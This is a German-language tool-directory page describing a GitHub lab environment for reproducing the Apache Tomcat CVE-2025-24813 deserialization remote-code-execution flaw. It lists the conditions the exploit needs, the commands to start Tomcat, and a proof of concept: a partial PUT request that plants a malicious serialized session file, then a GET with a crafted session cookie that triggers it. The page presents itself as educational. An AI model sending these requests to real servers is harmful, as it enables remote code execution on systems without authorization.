Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24813 — tomcat CVE-2025-24813 反序列化RCE环境 | Kitploit
Tools/GitHubGitHub/x1ongsec/cve-2025-24813
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubx1ongsec/cve-2025-24813

CVE-2025-24813

tomcat CVE-2025-24813 反序列化RCE环境

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Beschreibung

Dieses Repository bietet eine Umgebung zur Reproduktion der aktuellen RCE-Schwachstelle CVE-2025-24813 in Tomcat.

Nur für Lern- und Forschungszwecke!

Voraussetzungen für die Ausnutzung

  • Die Anwendung hat die Schreibfunktion des DefaultServlet aktiviert, die standardmäßig deaktiviert ist.
  • Die Anwendung unterstützt partielle PUT-Anfragen, mit denen bösartige serialisierte Daten in die Sitzungsdateien geschrieben werden können. Diese Funktion ist standardmäßig aktiviert.
  • Die Anwendung verwendet die Datei-Sitzungspersistenz von Tomcat und den standardmäßigen Sitzungsspeicherort, was eine zusätzliche Konfiguration erfordert.
  • Die Anwendung enthält eine Bibliothek mit einer Deserialisierungsschwachstelle, z. B. commons-collections im Klassenpfad. Diese Bedingung hängt davon ab, ob die Geschäftslogik von einer Bibliothek abhängt, die eine Deserialisierungs-Exploit-Kette enthält.

Diese Umgebung hat die oben genannten Bedingungen für die Reproduktion aktiviert.

Tomcat starten

Linux:

root@kitploit:~
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run

Windows:

root@kitploit:~
apache-tomcat-9.0.98/bin/catalina.bat run

Zugriff: http://127.0.0.1:9001/

image

POC

Erstellen Sie eine bösartige serialisierte Datei und laden Sie sie mit dem folgenden Datenpaket hoch. Beachten Sie, dass der Bereichswert (Range) mit der Länge (Length) übereinstimmen und größer als die aktuelle Dateigröße sein muss.

root@kitploit:~
PUT /xxxxx/session HTTP/1.1  
Host: 192.168.131.32:8080  
Content-Length: 1000  
Content-Range: bytes 0-1000/1200  

{{反序列化文件内容)}}

Zum Auslösen verwenden Sie den folgenden POC:

root@kitploit:~
GET / HTTP/1.1  
Host: 192.168.131.32:8080  
Cookie: JSESSIONID=.xxxxx
image image

Referenz: https://forum.butian.net/article/674

Tool herunterladen